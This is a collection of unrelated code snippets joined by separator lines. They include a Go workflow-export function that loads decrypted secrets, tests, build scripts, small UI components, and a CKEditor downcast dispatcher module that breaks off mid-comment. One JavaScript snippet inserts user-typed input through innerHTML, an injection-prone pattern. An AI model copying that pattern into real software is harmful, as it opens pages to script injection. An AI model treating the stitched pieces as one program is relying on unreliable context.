func Pull(ctx context.Context, db gorp.SqlExecutor, cache cache.Store, proj sdk.Project, name string,
encryptFunc sdk.EncryptFunc, opts ...v2.ExportOptions) (exportentities.WorkflowComponents, error) {
ctx, end := observability.Span(ctx, "workflow.Pull")
defer end()
var wp exportentities.WorkflowComponents
wf, err := Load(ctx, db, cache, proj, name, LoadOptions{
DeepPipeline: true,
WithTemplate: true,
})
if err != nil {
return wp, sdk.WrapError(err, "cannot load workflow %s", name)
}
if wf.TemplateInstance != nil {
return exportentities.WorkflowComponents{
Template: exportentities.TemplateInstance{
Name: wf.Name,
From: fmt.Sprintf("%s@%d", wf.TemplateInstance.Template.Path(), wf.TemplateInstance.WorkflowTemplateVersion),
Parameters: wf.TemplateInstance.Request.Parameters,
},
}, nil
}
// Reload app to retrieve secrets
for i := range wf.Applications {
app := wf.Applications[i]
vars, err := application.LoadAllVariablesWithDecrytion(db, app.ID)
if err != nil {
return wp, sdk.WrapError(err, "cannot load application variables %s", app.Name)
}
app.Variables = vars
keys, err := application.LoadAllKeysWithPrivateContent(db, app.ID)
if err != nil {
return wp, sdk.WrapError(err, "cannot load application keys %s", app.Name)
}
app.Keys = keys
wf.Applications[i] = app
}
// Reload env to retrieve secrets
for i := range wf.Environments {
env := wf.Environments[i]
vars, err := environment.LoadAllVariablesWithDecrytion(db, env.ID)
if err != nil {
return wp, sdk.WrapError(err, "cannot load environment variables %s", env.Name)
}
env.Variables = vars
keys, err := environment.LoadAllKeysWithPrivateContent(db, env.ID)
if err != nil {
return wp, sdk.WrapError(err, "cannot load environment keys %s", env.Name)
}
env.Keys = keys
wf.Environments[i] = env
}
// If the repository is "as-code", hide the hook
if wf.FromRepository != "" {
opts = append(opts, v2.WorkflowSkipIfOnlyOneRepoWebhook)
}
wp.Workflow, err = exportentities.NewWorkflow(ctx, *wf, opts...)
if err != nil {
return wp, sdk.WrapError(err, "unable to export workflow")
}
for _, a := range wf.Applications {
if a.FromRepository != wf.FromRepository { // don't export if coming from an other repository
continue
}
app, err := application.ExportApplication(db, a, encryptFunc)
if err != nil {
return wp, sdk.WrapError(err, "unable to export app %s", a.Name)
}
wp.Applications = append(wp.Applications, app)
}
for _, e := range wf.Environments {
if e.FromRepository != wf.FromRepository { // don't export if coming from an other repository
continue
}
env, err := environment.ExportEnvironment(db, e, encryptFunc)
if err != nil {
return wp, sdk.WrapError(err, "unable to export env %s", e.Name)
}
wp.Environments = append(wp.Environments, env)
}
for _, p := range wf.Pipelines {
if p.FromRepository != wf.FromRepository { // don't export if coming from an other repository
continue
}
wp.Pipelines = append(wp.Pipelines, exportentities.NewPipelineV1(p))
}
return wp, nil
}
|
<gh_stars>10-100
/**
* Copyright (C) Oranda - All Rights Reserved (January 2021 - January 2021)
*/
import { HaliaCore, HaliaPlugin, OptionalDependencies, OptionalDependenciesPatch } from "../src";
import { haliaCoreAPI, HaliaStack } from "../src/halia";
import { expect } from "chai";
describe("Extensions", () => {
it("should have no registered elements", async () => {
expect(haliaCoreAPI.importRegister.size()).equals(0);
});
it("should not inject optional dependencies", async () => {
// Initialize the Stack
const stack = new HaliaStack<HaliaPlugin & OptionalDependenciesPatch>();
stack.register({ name: "P1", install: () => "P1", id: "p1" });
stack.register({ name: "P2", install: ({ p1 }) => expect(p1).equals(undefined), id: "p2", optionalDependencies: ["p1"] });
// Build the Stack
await stack.build();
});
it("should build with optional dependencies", async () => {
// Initialize the Stack
const coreStack = new HaliaStack();
// Register Elements
coreStack.register(HaliaCore);
coreStack.register(OptionalDependencies);
// Build the Stack
await coreStack.build();
expect(haliaCoreAPI.importRegister.size()).equals(1);
});
it("should inject optional dependencies", async () => {
// Initialize the Stack
const stack = new HaliaStack<HaliaPlugin & OptionalDependenciesPatch>();
stack.register({ name: "P1", install: () => "P1", id: "p1" });
stack.register({ name: "P2", install: ({ p1 }) => expect(p1).equals("P1"), id: "p2", optionalDependencies: ["p1"] });
// Build the Stack
await stack.build();
});
});
|
#!/bin/sh
GPU=$1
DATA=$2
ARCH=$3
CKPT=$4
if [ $# -ne 4 ]
then
echo "Arguments error: <GPU_ID> <DATASET> <ARCH> <CKPT>"
exit 1
fi
python train.py \
--eval \
--resume $CKPT \
--sgpu $GPU \
-d $DATA \
-a $ARCH \
-n 64 \
-m 0 \
--name test
|
#!/bin/bash
# Copyright 2014 The Go Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# For testing Native Client on builders or locally.
# Builds a test file system and embeds it into package syscall
# in every generated binary.
#
# Assumes that sel_ldr binaries and go_nacl_$GOARCH_exec scripts are in $PATH;
# see ../misc/nacl/README.
set -e
ulimit -c 0
# guess GOARCH if not set
naclGOARCH=$GOARCH
if [ -z "$naclGOARCH" ]; then
case "$(uname -m)" in
x86_64)
naclGOARCH=amd64p32
;;
armv7l) # NativeClient on ARM only supports ARMv7A.
naclGOARCH=arm
;;
i?86)
naclGOARCH=386
;;
esac
fi
# Check GOARCH.
case "$naclGOARCH" in
amd64p32)
if ! which sel_ldr_x86_64 >/dev/null; then
echo 'cannot find sel_ldr_x86_64' 1>&2
exit 1
fi
;;
386)
if ! which sel_ldr_x86_32 >/dev/null; then
echo 'cannot find sel_ldr_x86_32' 1>&2
exit 1
fi
;;
arm)
if ! which sel_ldr_arm >/dev/null; then
echo 'cannot find sel_ldr_arm' 1>&2
exit 1
fi
;;
*)
echo 'unsupported $GOARCH for nacl: '"$naclGOARCH" 1>&2
exit 1
esac
if ! which go_nacl_${naclGOARCH}_exec >/dev/null; then
echo "cannot find go_nacl_${naclGOARCH}_exec, see ../misc/nacl/README." 1>&2
exit 1
fi
# Run host build to get toolchain for running zip generator.
unset GOOS GOARCH
if [ ! -f make.bash ]; then
echo 'nacl.bash must be run from $GOROOT/src' 1>&2
exit 1
fi
GOOS=$GOHOSTOS GOARCH=$GOHOSTARCH ./make.bash
# the builder might have set GOROOT_FINAL.
export GOROOT=$(pwd)/..
# Build zip file embedded in package syscall.
gobin=${GOBIN:-$(pwd)/../bin}
rm -f syscall/fstest_nacl.go
GOOS=$GOHOSTOS GOARCH=$GOHOSTARCH $gobin/go run ../misc/nacl/mkzip.go -p syscall -r .. ../misc/nacl/testzip.proto syscall/fstest_nacl.go
# Run standard build and tests.
export PATH=$(pwd)/../misc/nacl:$PATH
GOOS=nacl GOARCH=$naclGOARCH ./all.bash --no-clean
|
func processNetworkResult<T>(_ result: NetworkResult<T>, completion: @escaping (NetworkResult<T>) -> Void) {
switch result {
case .success(let value):
completion(.success(value))
case .failure(let error):
completion(.failure(error))
}
}
|
bundle install
bundle exec fastlane prep
|
package com.lbs.server.conversation
import akka.actor.{ActorSystem, Cancellable}
import com.lbs.bot.model.{Command, MessageSource}
import com.lbs.common.Logger
import com.lbs.server.conversation.Account.SwitchAccount
import com.lbs.server.conversation.base.Conversation
import scala.collection.mutable
import scala.concurrent.ExecutionContextExecutor
import scala.concurrent.duration.DurationLong
class Router(authFactory: MessageSourceTo[Auth])(val actorSystem: ActorSystem) extends Conversation[Unit] with Logger {
private case class DestroyChat(source: MessageSource)
private val chats = mutable.Map.empty[MessageSource, Auth]
private val timers = mutable.Map.empty[MessageSource, Cancellable]
private val idleTimeout = 1.hour
private implicit val dispatcher: ExecutionContextExecutor = actorSystem.dispatcher
entryPoint(routeMessage)
private def routeMessage: Step =
monologue {
case Msg(cmd@Command(source, _, _), _) =>
val chat = instantiateChatOrGet(source)
chat ! cmd
stay()
case Msg(DestroyChat(source), _) =>
info(s"Destroying chat for $source due to $idleTimeout of inactivity")
destroyChat(source)
stay()
case Msg(SwitchAccount(userId), _) =>
switchAccount(userId)
stay()
case msg: Msg =>
info(s"Unknown message received: $msg")
stay()
}
private def instantiateChatOrGet(source: MessageSource) = {
scheduleIdleChatDestroyer(source)
chats.getOrElseUpdate(source, authFactory(source))
}
private def destroyChat(source: MessageSource): Unit = {
timers.remove(source)
removeChat(source)
}
private def switchAccount(userId: Login.UserId): Unit = {
removeChat(userId.source)
chats += userId.source -> authFactory(userId.source)
}
private def removeChat(source: MessageSource): Unit = {
chats.remove(source).foreach(_.destroy())
}
private def scheduleIdleChatDestroyer(source: MessageSource): Unit = {
timers.remove(source).foreach(_.cancel())
val cancellable = actorSystem.scheduler.scheduleOnce(idleTimeout) {
self ! DestroyChat(source)
}
timers += source -> cancellable
}
beforeDestroy {
chats.foreach(chat => destroyChat(chat._1))
}
}
|
import { useState } from 'react';
import styled from 'styled-components';
export default (props) => {
const [hover, setHover] = useState(false);
return (
<Button
{...props}
hover={hover}
onFocus={() => setHover(true)}
onMouseEnter={() => setHover(true)}
onBlur={() => setHover(false)}
onMouseLeave={() => setHover(false)}
>
<ButtonBorder
hover={hover}
size={props.size}
color={props.color}
hoverColor={props.hoverColor}
/>
{props.children}
</Button>
);
};
const ButtonBorder = styled.div`
position: absolute;
left: 0;
top: 0;
width: 100%;
height: 100%;
border-radius: 50%;
${({ hover }) => !hover} {
left: -20%;
top: -20%;
width: 140%;
height: 140%;
border: calc(${({ size }) => size}/12) solid ${({ hoverColor }) => hoverColor};
}
transition: background 0.2s,
border 0.2s,
left 0.2s,
top 0.2s,
width 0.2s,
height 0.2s;
`;
const Button = styled.button`
position: relative;
width: ${({ size }) => size};
height: ${({ size }) => size};
border: 0;
border-radius: 50%;
background-color: ${({ color }) => color};
font-size: calc(${({ size }) => size}/2);
display: flex;
justify-content: center;
align-items: center;
${({ hover }) => !hover} {
background-color: ${({ hoverColor }) => hoverColor};
}
transition: background 0.2s,
border 0.2s,
left 0.2s,
top 0.2s
`;
|
public class RouteMapper
{
private Dictionary<string, string> routeMappings;
public RouteMapper()
{
routeMappings = new Dictionary<string, string>();
}
public void AddRouteMapping(string urlPattern, string controllerAction)
{
routeMappings[urlPattern] = controllerAction;
}
public string MapUrlToControllerAction(string url)
{
foreach (var mapping in routeMappings)
{
if (IsUrlMatchingPattern(url, mapping.Key))
{
return mapping.Value;
}
}
return "No matching route found";
}
private bool IsUrlMatchingPattern(string url, string pattern)
{
// Implement URL pattern matching logic here
// This can be done using regular expressions or custom parsing logic
// For simplicity, assume exact URL matching for this example
return url == pattern;
}
}
|
const introPic = document.getElementById('changePic');
const bottonNewName = document.getElementById('newName');
let spanName = document.getElementById('name');
let pink = document.querySelectorAll('.pink-bg');
const pinkText = document.querySelectorAll('.pink-text');
const links = document.querySelectorAll('a');
let listaModify = document.querySelector('#front-dev-tools');
const bottomModify = document.getElementById('modifyTechnologies');
const moreSkills = document.getElementById('addingToList');//input field;
const buttomSubmitSkills = document.getElementById('listButtom');//boton
const listBackend = document.getElementById("dev-tools-back-list");//backend list
console.log(moreSkills, buttomSubmitSkills);
//ALL EVENT LISTENERS:
//change pic:
introPic.addEventListener('click', () => {
introPic.style.borderRadius = '50%';
introPic.src = 'image/logo-wcs.png';
introPic.style.width = '11.5vw';
});
//change name and color:
bottonNewName.addEventListener('click', () => {
let newName = prompt("Please enter your name");
let newColor = prompt("Please enter your favorite color");
spanName.textContent = newName;
spanName.style.color = 'white';
// pink.style.backgroundColor = '#750ff7';
pink.forEach(el => el.style.backgroundColor = newColor);
pinkText.forEach(el => el.style.color = newColor);
//add class to anchor:
links.forEach(el => el.classList.add('purple-text'))
});
bottomModify.addEventListener('click', () => {
const newContent = ['VSCode', 'Github', 'Terminal'];
while (listaModify.firstChild) {
listaModify.removeChild(listaModify.firstChild);
};
newContent.forEach(el => {
// document.createElement('li').innerHTML = el;
let lista = document.createElement('li');
lista.innerHTML = el;
listaModify.appendChild(lista);
});
// listaModify
})
//adding skills to backend list:
buttomSubmitSkills.addEventListener('click', () => {
let adding = moreSkills.value;
let nuevaLista = document.createElement('li');
nuevaLista.innerHTML = adding;
listBackend.appendChild(nuevaLista);
moreSkills.value = '';
})
|
<filename>src/interfaces/requests/list-meeting-registrants.ts<gh_stars>1-10
import { RegistrantStatus } from '../constants';
export interface GetListMeetingRegistrantsParams {
meetingId: number;
queryParams?: {
occurrence_id?: string;
status?: RegistrantStatus;
page_size?: number;
page_number?: number;
next_page_token?: string;
};
}
|
package com.timwang.algorithm.warmup.bowling;
import com.timwang.algorithm.warmup.bowling.calculate.BowlingRoundCalculator;
import com.timwang.algorithm.warmup.bowling.roll.BowlingRoll;
import com.timwang.algorithm.warmup.bowling.round.BowlingRound;
import com.timwang.algorithm.warmup.bowling.rule.SpareAddScoreRule;
import com.timwang.algorithm.warmup.bowling.rule.StrikeAddScoreRule;
// Please don't modify the class name.
public class Bowling {
private BowlingRound bowlingRound = BowlingRoll.init();
// Please don't modify the signature of this method.
public void roll(int n) {
BowlingRoll.rollN(bowlingRound, n);
}
// Please don't modify the signature of this method.
public int getScore() {
BowlingRoundCalculator calculator = new BowlingRoundCalculator();
calculator.addRule(new SpareAddScoreRule());
calculator.addRule(new StrikeAddScoreRule());
return calculator.calculate(bowlingRound);
}
public void toLinkedString() {
bowlingRound.toLinkedString();
}
}
|
export { name } from "./name"
export { description } from "./description"
export { uniqueName } from "./uniqueName"
|
echo "" | base64 -D -o scrollbar.png
|
/**
* @license Copyright (c) 2003-2020, CKSource - <NAME>. All rights reserved.
* For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license
*/
/**
* @module engine/conversion/downcastdispatcher
*/
import Consumable from './modelconsumable';
import Range from '../model/range';
import EmitterMixin from '@ckeditor/ckeditor5-utils/src/emittermixin';
import mix from '@ckeditor/ckeditor5-utils/src/mix';
/**
* Downcast dispatcher is a central point of downcasting (conversion from the model to the view), which is a process of reacting to changes
* in the model and firing a set of events. Callbacks listening to these events are called converters. The
* converters' role is to convert the model changes to changes in view (for example, adding view nodes or
* changing attributes on view elements).
*
* During the conversion process, downcast dispatcher fires events basing on the state of the model and prepares
* data for these events. It is important to understand that the events are connected with the changes done on the model,
* for example: "a node has been inserted" or "an attribute has changed". This is in contrary to upcasting (a view-to-model conversion)
* where you convert the view state (view nodes) to a model tree.
*
* The events are prepared basing on a diff created by {@link module:engine/model/differ~Differ Differ}, which buffers them
* and then passes to the downcast dispatcher as a diff between the old model state and the new model state.
*
* Note that because the changes are converted, there is a need to have a mapping between the model structure and the view structure.
* To map positions and elements during the downcast (a model-to-view conversion), use {@link module:engine/conversion/mapper~Mapper}.
*
* Downcast dispatcher fires the following events for model tree changes:
*
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:insert `insert`} –
* If a range of nodes was inserted to the model tree.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:remove `remove`} –
* If a range of nodes was removed from the model tree.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:attribute `attribute`} –
* If an attribute was added, changed or removed from a model node.
*
* For {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:insert `insert`}
* and {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:attribute `attribute`},
* downcast dispatcher generates {@link module:engine/conversion/modelconsumable~ModelConsumable consumables}.
* These are used to have control over which changes have already been consumed. It is useful when some converters
* overwrite others or convert multiple changes (for example, it converts an insertion of an element and also converts that
* element's attributes during the insertion).
*
* Additionally, downcast dispatcher fires events for {@link module:engine/model/markercollection~Marker marker} changes:
*
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:addMarker} – If a marker was added.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:removeMarker} – If a marker was removed.
*
* Note that changing a marker is done through removing the marker from the old range and adding it on the new range,
* so both events are fired.
*
* Finally, downcast dispatcher also handles firing events for the {@link module:engine/model/selection model selection}
* conversion:
*
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:selection}
* – Converts the selection from the model to the view.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:attribute}
* – Fired for every selection attribute.
* * {@link module:engine/conversion/downcastdispatcher~DowncastDispatcher#event:addMarker}
* – Fired for every marker that contains a selection.
*
* Unlike model tree and markers, events for selection are not fired for changes but for selection state.
*
* When providing custom listeners for downcast dispatcher, remember to check whether a given change has not been
* {@link module:engine/conversion/modelconsumable~ModelConsumable#consume consumed} yet.
*
* When providing custom listeners for downcast dispatcher, keep in mind that any callback that has
* {@link module:engine/conversion/modelconsumable~ModelConsumable#consume consumed} a value from a consumable and
* converted the change should also stop the event (for efficiency purposes).
*
* When providing custom listeners for downcast dispatcher, remember to use the provided
* {@link module:engine/view/downcastwriter~DowncastWriter view downcast writer} to apply changes to the view document.
*
* You can read more about conversion in the following guides:
*
* * {@glink framework/guides/deep-dive/conversion/conversion-introduction Advanced conversion concepts — attributes}
* * {@glink framework/guides/deep-dive/conversion/conversion-extending-output Extending the editor output }
* * {@glink framework/guides/deep-dive/conversion/custom-element-conversion Custom element conversion}
*
* An example of a custom converter for the downcast dispatcher:
*
* // You will convert inserting a "paragraph" model element into the model.
* downcastDispatcher.on( 'insert:paragraph', ( evt, data, conversionApi ) => {
* // Remember to check whether the change has not been consumed yet and consume it.
* if ( conversionApi.consumable.consume( data.item, 'insert' ) ) {
* return;
* }
*
* // Translate the position in the model to a position in the view.
* const viewPosition = conversionApi.mapper.toViewPosition( data.range.start );
*
* // Create a <p> element that will be inserted into the view at the `viewPosition`.
* const viewElement = conversionApi.writer.createContainerElement( 'p' );
*
* // Bind the newly created view element to the model element so positions will map accordingly in the future.
* conversionApi.mapper.bindElements( data.item, viewElement );
*
* // Add the newly created view element to the view.
* conversionApi.writer.insert( viewPosition, viewElement );
*
* // Remember to stop the event propagation.
* evt.stop();
* } );
*/
export default class DowncastDispatcher {
/**
* Creates a downcast dispatcher instance.
*
* @see module:engine/conversion/downcastdispatcher~DowncastConversionApi
* @param {Object} conversionApi Additional properties for an interface that will be passed to events fired
* by the downcast dispatcher.
*/
constructor( conversionApi ) {
/**
* An interface passed by the dispatcher to the event callbacks.
*
* @member {module:engine/conversion/downcastdispatcher~DowncastConversionApi}
*/
this.conversionApi = Object.assign( { dispatcher: this }, conversionApi );
}
/**
* Takes a {@link module:engine/model/differ~Differ model differ} object with buffered changes and fires conversion basing on it.
*
* @param {module:engine/model/differ~Differ} differ The differ object with buffered changes.
* @param {module:engine/model/markercollection~MarkerCollection} markers Markers connected with the converted model.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer The view writer that should be used to modify the view document.
*/
convertChanges( differ, markers, writer ) {
// Before the view is updated, remove markers which have changed.
for ( const change of differ.getMarkersToRemove() ) {
this.convertMarkerRemove( change.name, change.range, writer );
}
// Convert changes that happened on model tree.
for ( const entry of differ.getChanges() ) {
if ( entry.type == 'insert' ) {
this.convertInsert( Range._createFromPositionAndShift( entry.position, entry.length ), writer );
} else if ( entry.type == 'remove' ) {
this.convertRemove( entry.position, entry.length, entry.name, writer );
} else {
// entry.type == 'attribute'.
this.convertAttribute( entry.range, entry.attributeKey, entry.attributeOldValue, entry.attributeNewValue, writer );
}
}
for ( const markerName of this.conversionApi.mapper.flushUnboundMarkerNames() ) {
const markerRange = markers.get( markerName ).getRange();
this.convertMarkerRemove( markerName, markerRange, writer );
this.convertMarkerAdd( markerName, markerRange, writer );
}
// After the view is updated, convert markers which have changed.
for ( const change of differ.getMarkersToAdd() ) {
this.convertMarkerAdd( change.name, change.range, writer );
}
}
/**
* Starts a conversion of a range insertion.
*
* For each node in the range, {@link #event:insert `insert` event is fired}. For each attribute on each node,
* {@link #event:attribute `attribute` event is fired}.
*
* @fires insert
* @fires attribute
* @param {module:engine/model/range~Range} range The inserted range.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer The view writer that should be used to modify the view document.
*/
convertInsert( range, writer ) {
this.conversionApi.writer = writer;
// Create a list of things that can be consumed, consisting of nodes and their attributes.
this.conversionApi.consumable = this._createInsertConsumable( range );
// Fire a separate insert event for each node and text fragment contained in the range.
for ( const value of range ) {
const item = value.item;
const itemRange = Range._createFromPositionAndShift( value.previousPosition, value.length );
const data = {
item,
range: itemRange
};
this._testAndFire( 'insert', data );
// Fire a separate addAttribute event for each attribute that was set on inserted items.
// This is important because most attributes converters will listen only to add/change/removeAttribute events.
// If we would not add this part, attributes on inserted nodes would not be converted.
for ( const key of item.getAttributeKeys() ) {
data.attributeKey = key;
data.attributeOldValue = null;
data.attributeNewValue = item.getAttribute( key );
this._testAndFire( `attribute:${ key }`, data );
}
}
this._clearConversionApi();
}
/**
* Fires conversion of a single node removal. Fires {@link #event:remove remove event} with provided data.
*
* @param {module:engine/model/position~Position} position Position from which node was removed.
* @param {Number} length Offset size of removed node.
* @param {String} name Name of removed node.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
*/
convertRemove( position, length, name, writer ) {
this.conversionApi.writer = writer;
this.fire( 'remove:' + name, { position, length }, this.conversionApi );
this._clearConversionApi();
}
/**
* Starts conversion of attribute change on given `range`.
*
* For each node in the given `range`, {@link #event:attribute attribute event} is fired with the passed data.
*
* @fires attribute
* @param {module:engine/model/range~Range} range Changed range.
* @param {String} key Key of the attribute that has changed.
* @param {*} oldValue Attribute value before the change or `null` if the attribute has not been set before.
* @param {*} newValue New attribute value or `null` if the attribute has been removed.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
*/
convertAttribute( range, key, oldValue, newValue, writer ) {
this.conversionApi.writer = writer;
// Create a list with attributes to consume.
this.conversionApi.consumable = this._createConsumableForRange( range, `attribute:${ key }` );
// Create a separate attribute event for each node in the range.
for ( const value of range ) {
const item = value.item;
const itemRange = Range._createFromPositionAndShift( value.previousPosition, value.length );
const data = {
item,
range: itemRange,
attributeKey: key,
attributeOldValue: oldValue,
attributeNewValue: newValue
};
this._testAndFire( `attribute:${ key }`, data );
}
this._clearConversionApi();
}
/**
* Starts model selection conversion.
*
* Fires events for given {@link module:engine/model/selection~Selection selection} to start selection conversion.
*
* @fires selection
* @fires addMarker
* @fires attribute
* @param {module:engine/model/selection~Selection} selection Selection to convert.
* @param {module:engine/model/markercollection~MarkerCollection} markers Markers connected with converted model.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
*/
convertSelection( selection, markers, writer ) {
const markersAtSelection = Array.from( markers.getMarkersAtPosition( selection.getFirstPosition() ) );
this.conversionApi.writer = writer;
this.conversionApi.consumable = this._createSelectionConsumable( selection, markersAtSelection );
this.fire( 'selection', { selection }, this.conversionApi );
if ( !selection.isCollapsed ) {
return;
}
for ( const marker of markersAtSelection ) {
const markerRange = marker.getRange();
if ( !shouldMarkerChangeBeConverted( selection.getFirstPosition(), marker, this.conversionApi.mapper ) ) {
continue;
}
const data = {
item: selection,
markerName: marker.name,
markerRange
};
if ( this.conversionApi.consumable.test( selection, 'addMarker:' + marker.name ) ) {
this.fire( 'addMarker:' + marker.name, data, this.conversionApi );
}
}
for ( const key of selection.getAttributeKeys() ) {
const data = {
item: selection,
range: selection.getFirstRange(),
attributeKey: key,
attributeOldValue: null,
attributeNewValue: selection.getAttribute( key )
};
// Do not fire event if the attribute has been consumed.
if ( this.conversionApi.consumable.test( selection, 'attribute:' + data.attributeKey ) ) {
this.fire( 'attribute:' + data.attributeKey + ':$text', data, this.conversionApi );
}
}
this._clearConversionApi();
}
/**
* Converts added marker. Fires {@link #event:addMarker addMarker} event for each item
* in marker's range. If range is collapsed single event is dispatched. See event description for more details.
*
* @fires addMarker
* @param {String} markerName Marker name.
* @param {module:engine/model/range~Range} markerRange Marker range.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
*/
convertMarkerAdd( markerName, markerRange, writer ) {
// Do not convert if range is in graveyard or not in the document (e.g. in DocumentFragment).
if ( !markerRange.root.document || markerRange.root.rootName == '$graveyard' ) {
return;
}
this.conversionApi.writer = writer;
// In markers' case, event name == consumable name.
const eventName = 'addMarker:' + markerName;
//
// First, fire an event for the whole marker.
//
const consumable = new Consumable();
consumable.add( markerRange, eventName );
this.conversionApi.consumable = consumable;
this.fire( eventName, { markerName, markerRange }, this.conversionApi );
//
// Do not fire events for each item inside the range if the range got consumed.
//
if ( !consumable.test( markerRange, eventName ) ) {
return;
}
//
// Then, fire an event for each item inside the marker range.
//
this.conversionApi.consumable = this._createConsumableForRange( markerRange, eventName );
for ( const item of markerRange.getItems() ) {
// Do not fire event for already consumed items.
if ( !this.conversionApi.consumable.test( item, eventName ) ) {
continue;
}
const data = { item, range: Range._createOn( item ), markerName, markerRange };
this.fire( eventName, data, this.conversionApi );
}
this._clearConversionApi();
}
/**
* Fires conversion of marker removal. Fires {@link #event:removeMarker removeMarker} event with provided data.
*
* @fires removeMarker
* @param {String} markerName Marker name.
* @param {module:engine/model/range~Range} markerRange Marker range.
* @param {module:engine/view/downcastwriter~DowncastWriter} writer View writer that should be used to modify view document.
*/
convertMarkerRemove( markerName, markerRange, writer ) {
// Do not convert if range is in graveyard or not in the document (e.g. in DocumentFragment).
if ( !markerRange.root.document || markerRange.root.rootName == '$graveyard' ) {
return;
}
this.conversionApi.writer = writer;
this.fire( 'removeMarker:' + markerName, { markerName, markerRange }, this.conversionApi );
this._clearConversionApi();
}
/**
* Creates {@link module:engine/conversion/modelconsumable~ModelConsumable} with values to consume from given range,
* assuming that the range has just been inserted to the model.
*
* @private
* @param {module:engine/model/range~Range} range Inserted range.
* @returns {module:engine/conversion/modelconsumable~ModelConsumable} Values to consume.
*/
_createInsertConsumable( range ) {
const consumable = new Consumable();
for ( const value of range ) {
const item = value.item;
consumable.add( item, 'insert' );
for ( const key of item.getAttributeKeys() ) {
consumable.add( item, 'attribute:' + key );
}
}
return consumable;
}
/**
* Creates {@link module:engine/conversion/modelconsumable~ModelConsumable} with values to consume for given range.
*
* @private
* @param {module:engine/model/range~Range} range Affected range.
* @param {String} type Consumable type.
* @returns {module:engine/conversion/modelconsumable~ModelConsumable} Values to consume.
*/
_createConsumableForRange( range, type ) {
const consumable = new Consumable();
for ( const item of range.getItems() ) {
consumable.add( item, type );
}
return consumable;
}
/**
* Creates {@link module:engine/conversion/modelconsumable~ModelConsumable} with selection consumable values.
*
* @private
* @param {module:engine/model/selection~Selection} selection Selection to create consumable from.
* @param {Iterable.<module:engine/model/markercollection~Marker>} markers Markers which contains selection.
* @returns {module:engine/conversion/modelconsumable~ModelConsumable} Values to consume.
*/
_createSelectionConsumable( selection, markers ) {
const consumable = new Consumable();
consumable.add( selection, 'selection' );
for ( const marker of markers ) {
consumable.add( selection, 'addMarker:' + marker.name );
}
for ( const key of selection.getAttributeKeys() ) {
consumable.add( selection, 'attribute:' + key );
}
return consumable;
}
/**
* Tests passed `consumable` to check whether given event can be fired and if so, fires it.
*
* @private
* @fires insert
* @fires attribute
* @param {String} type Event type.
* @param {Object} data Event data.
*/
_testAndFire( type, data ) {
if ( !this.conversionApi.consumable.test( data.item, type ) ) {
// Do not fire event if the item was consumed.
return;
}
const name = data.item.name || '$text';
this.fire( type + ':' + name, data, this.conversionApi );
}
/**
* Clears conversion API object.
*
* @private
*/
_clearConversionApi() {
delete this.conversionApi.writer;
delete this.conversionApi.consumable;
}
/**
* Fired for inserted nodes.
*
* `insert` is a namespace for a class of events. Names of actually called events follow this pattern:
* `insert:name`. `name` is either `'$text'`, when {@link module:engine/model/text~Text a text node} has been inserted,
* or {@link module:engine/model/element~Element#name name} of inserted element.
*
* This way listeners can either listen to a general `insert` event or specific event (for example `insert:paragraph`).
*
* @event insert
* @param {Object} data Additional information about the change.
* @param {module:engine/model/item~Item} data.item Inserted item.
* @param {module:engine/model/range~Range} data.range Range spanning over inserted item.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired for removed nodes.
*
* `remove` is a namespace for a class of events. Names of actually called events follow this pattern:
* `remove:name`. `name` is either `'$text'`, when {@link module:engine/model/text~Text a text node} has been removed,
* or the {@link module:engine/model/element~Element#name name} of removed element.
*
* This way listeners can either listen to a general `remove` event or specific event (for example `remove:paragraph`).
*
* @event remove
* @param {Object} data Additional information about the change.
* @param {module:engine/model/position~Position} data.position Position from which the node has been removed.
* @param {Number} data.length Offset size of the removed node.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired in the following cases:
*
* * when an attribute has been added, changed, or removed from a node,
* * when a node with an attribute is inserted,
* * when collapsed model selection attribute is converted.
*
* `attribute` is a namespace for a class of events. Names of actually called events follow this pattern:
* `attribute:attributeKey:name`. `attributeKey` is the key of added/changed/removed attribute.
* `name` is either `'$text'` if change was on {@link module:engine/model/text~Text a text node},
* or the {@link module:engine/model/element~Element#name name} of element which attribute has changed.
*
* This way listeners can either listen to a general `attribute:bold` event or specific event (for example `attribute:src:image`).
*
* @event attribute
* @param {Object} data Additional information about the change.
* @param {module:engine/model/item~Item|module:engine/model/documentselection~DocumentSelection} data.item Changed item
* or converted selection.
* @param {module:engine/model/range~Range} data.range Range spanning over changed item or selection range.
* @param {String} data.attributeKey Attribute key.
* @param {*} data.attributeOldValue Attribute value before the change. This is `null` when selection attribute is converted.
* @param {*} data.attributeNewValue New attribute value.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired for {@link module:engine/model/selection~Selection selection} changes.
*
* @event selection
* @param {module:engine/model/selection~Selection} selection Selection that is converted.
* @param {module:engine/conversion/downcastdispatcher~DowncastConversionApi} conversionApi Conversion interface
* to be used by callback, passed in `DowncastDispatcher` constructor.
*/
/**
* Fired when a new marker is added to the model. Also fired when collapsed model selection that is inside a marker is converted.
*
* `addMarker` is a namespace for a class of events. Names of actually called events follow this pattern:
* `addMarker:markerName`. By specifying certain marker names, you can make the events even more gradual. For example,
